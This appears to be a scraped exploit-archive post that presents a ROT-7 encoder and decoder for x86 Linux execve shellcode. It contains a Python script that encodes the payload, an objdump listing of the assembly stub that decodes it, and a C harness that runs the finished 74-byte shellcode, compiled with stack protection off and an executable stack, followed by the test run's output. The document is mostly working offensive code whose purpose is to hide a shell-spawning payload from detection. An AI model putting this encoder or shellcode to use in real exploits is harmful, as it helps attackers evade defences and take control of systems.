133 lines
No EOL
4.3 KiB
Text
133 lines
No EOL
4.3 KiB
Text
/*
|
|
|
|
ROT-7 Decoder Shellcode - Linux Intel/x86
|
|
Author: Stavros Metzidakis
|
|
|
|
*/
|
|
|
|
|
|
a) Python ROT-7 encoder for shellcode (execve-stack)
|
|
---------------------------------------------------------------------------------------
|
|
#!/usr/bin/python
|
|
|
|
# Python ROT-7 Encoder
|
|
|
|
shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
|
|
|
|
encoded = ""
|
|
encoded2 = ""
|
|
|
|
print 'Encoded shellcode ...'
|
|
|
|
for x in bytearray(shellcode) :
|
|
# boundary is computed as 255-ROT(x) where x, the amount to rotate by
|
|
if x > 248:
|
|
encoded += '\\x'
|
|
encoded += '%02x' %(7 -(256 - x))
|
|
encoded2 += '0x'
|
|
encoded2 += '%02x,' %(7 -(256 - x))
|
|
else:
|
|
encoded += '\\x'
|
|
encoded += '%02x'%(x+7)
|
|
encoded2 += '0x'
|
|
encoded2 += '%02x,' %(x+7)
|
|
|
|
|
|
print encoded
|
|
|
|
print encoded2
|
|
|
|
print 'Len: %d' % len(bytearray(shellcode))
|
|
---------------------------------------------------------------------------------------
|
|
Test run:
|
|
$ ./rot-7-encoder.py
|
|
Encoded shellcode ...
|
|
\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87
|
|
0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87,
|
|
Len: 30
|
|
|
|
|
|
|
|
|
|
b) Decoder for a ROT-7 encoded shellcode (execve-stack)
|
|
---------------------------------------------------------------------------------------
|
|
$objdump -d rot-7-decoder -M intel
|
|
|
|
rot-7-decoder: file format elf32-i386
|
|
|
|
|
|
Disassembly of section .text:
|
|
|
|
08048060 <_start>:
|
|
8048060: eb 25 jmp 8048087 <call_decoder>
|
|
|
|
08048062 <decoder>:
|
|
8048062: 5e pop esi
|
|
8048063: 31 c9 xor ecx,ecx
|
|
8048065: b1 1e mov cl,0x1e ;ROTed shellcode length goes here
|
|
|
|
08048067 <decode>:
|
|
8048067: 80 3e 07 cmp BYTE PTR [esi],0x7
|
|
804806a: 7c 05 jl 8048071 <lowbound>
|
|
804806c: 80 2e 07 sub BYTE PTR [esi],0x7
|
|
804806f: eb 11 jmp 8048082 <common_commands>
|
|
|
|
08048071 <lowbound>:
|
|
8048071: 31 db xor ebx,ebx
|
|
8048073: 31 d2 xor edx,edx
|
|
8048075: b3 07 mov bl,0x7
|
|
8048077: b2 ff mov dl,0xff
|
|
8048079: 66 42 inc dx
|
|
804807b: 2a 1e sub bl,BYTE PTR [esi]
|
|
804807d: 66 29 da sub dx,bx
|
|
8048080: 88 16 mov BYTE PTR [esi],dl
|
|
|
|
08048082 <common_commands>:
|
|
8048082: 46 inc esi
|
|
8048083: e2 e2 loop 8048067 <decode>
|
|
8048085: eb 05 jmp 804808c <Shellcode>
|
|
|
|
08048087 <call_decoder>:
|
|
8048087: e8 d6 ff ff ff call 8048062 <decoder>
|
|
|
|
0804808c <Shellcode>: ;ROTed shellcode
|
|
804808c: 38 c7 cmp bh,al
|
|
804808e: 57 push edi
|
|
804808f: 6f outs dx,DWORD PTR ds:[esi]
|
|
8048090: 69 68 7a 6f 6f 69 70 imul ebp,DWORD PTR [eax+0x7a],0x70696f6f
|
|
8048097: 75 36 jne 80480cf <Shellcode+0x43>
|
|
8048099: 6f outs dx,DWORD PTR ds:[esi]
|
|
804809a: 36 ss
|
|
804809b: 36 ss
|
|
804809c: 36 ss
|
|
804809d: 36 ss
|
|
804809e: 90 nop
|
|
804809f: ea 57 90 e9 5a 90 e8 jmp 0xe890:0x5ae99057
|
|
80480a6: b7 12 mov bh,0x12
|
|
80480a8: d4 87 aam 0x87
|
|
---------------------------------------------------------------------------------------
|
|
|
|
|
|
$ cat shellcode.c
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char code[] = "\xeb\x25\x5e\x31\xc9\xb1\x1e\x80\x3e\x07\x7c\x05\x80\x2e\x07\xeb\x11\x31\xdb\x31\xd2\xb3\x07\xb2\xff\x66\x42\x2a\x1e\x66\x29\xda\x88\x16\x46\xe2\xe2\xeb\x05\xe8\xd6\xff\xff\xff\x38\xc7\x57\x6f\x69\x68\x7a\x6f\x6f\x69\x70\x75\x36\x6f\x36\x36\x36\x36\x90\xea\x57\x90\xe9\x5a\x90\xe8\xb7\x12\xd4\x87";
|
|
|
|
main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
}
|
|
|
|
|
|
$ gcc ./shellcode.c -fno-stack-protector -z execstack -o shellcode
|
|
$ ./shellcode
|
|
Shellcode Length: 74
|
|
$ |